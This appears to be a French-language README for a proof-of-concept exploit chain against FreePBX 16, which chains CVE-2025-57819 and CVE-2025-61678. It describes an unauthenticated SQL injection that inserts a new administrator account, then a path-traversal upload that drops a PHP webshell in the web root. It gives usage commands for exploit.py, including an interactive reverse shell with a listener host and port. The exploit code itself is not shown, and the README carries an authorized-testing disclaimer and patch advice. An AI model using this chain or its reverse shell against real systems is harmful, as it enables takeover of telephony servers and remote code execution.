
Chaîne d'exploitation d'injection SQL non authentifiée et de téléchargement de fichier arbitraire pour FreePBX 16, réalisant une exécution de code à distance via la création d'administrateur et le déploiement de webshell.
| CVE | Composant | Impact |
|---|
| CVE-2025-57819 | Chargeur de module Endpoint (paramètre brand) | Injection SQL empilée non authentifiée |
| CVE-2025-61678 | Téléchargeur de firmware Endpoint Manager (paramètre fwbrand) | Téléchargement arbitraire de fichiers authentifié (traversée de chemin) |
INSERT un tout nouvel administrateur avec accès complet directement dans la table ampusers.../../../var/www/html/<dir> dans fwbrand pour écrire une webshell PHP dans la racine web.FreePBX 16 (module Endpoint antérieur à 16.0.92). Également corrigé dans 17.0.6. Mettez à jour vers une version corrigée.
# single command
python3 exploit.py --rhost pbx.example.com --command "id"
# interactive reverse shell (auto-listener via pwntools)
python3 exploit.py --rhost pbx.example.com --lhost 10.0.0.5 --lport 4444
# plain HTTP / custom port
python3 exploit.py --rhost pbx.example.com --http --rport 80 --command "uname -a"
| Option | Description |
|---|---|
--rhost | Hôte cible (obligatoire) |
--rport | Port cible (par défaut 443) |
--http | Utiliser HTTP au lieu de HTTPS |
--lhost / --lport | Adresse de rappel du shell inversé |
--command | Exécuter une seule commande au lieu d'un shell |
pip install requests pwntools
Pour les tests de sécurité autorisés et à des fins éducatives uniquement. Utilisez-le exclusivement sur des systèmes que vous possédez ou pour lesquels vous avez une autorisation écrite explicite de tester. L'auteur décline toute responsabilité en cas d'utilisation abusive.
FreePBX · FreePBX 16 · FreePBX 16.0.40.7 · Sangoma PBX · Asterisk · CVE-2025-57819 · CVE-2025-61678 · injection SQL non authentifiée · injection de requête empilée · module Endpoint · Endpoint Manager · téléchargement de fichier authentifié · traversée de chemin · exécution de code à distance · RCE · PoC · exploit · sécurité VoIP
linkedin: ehxb · medium.com/@Ehxb · github 0xEhxb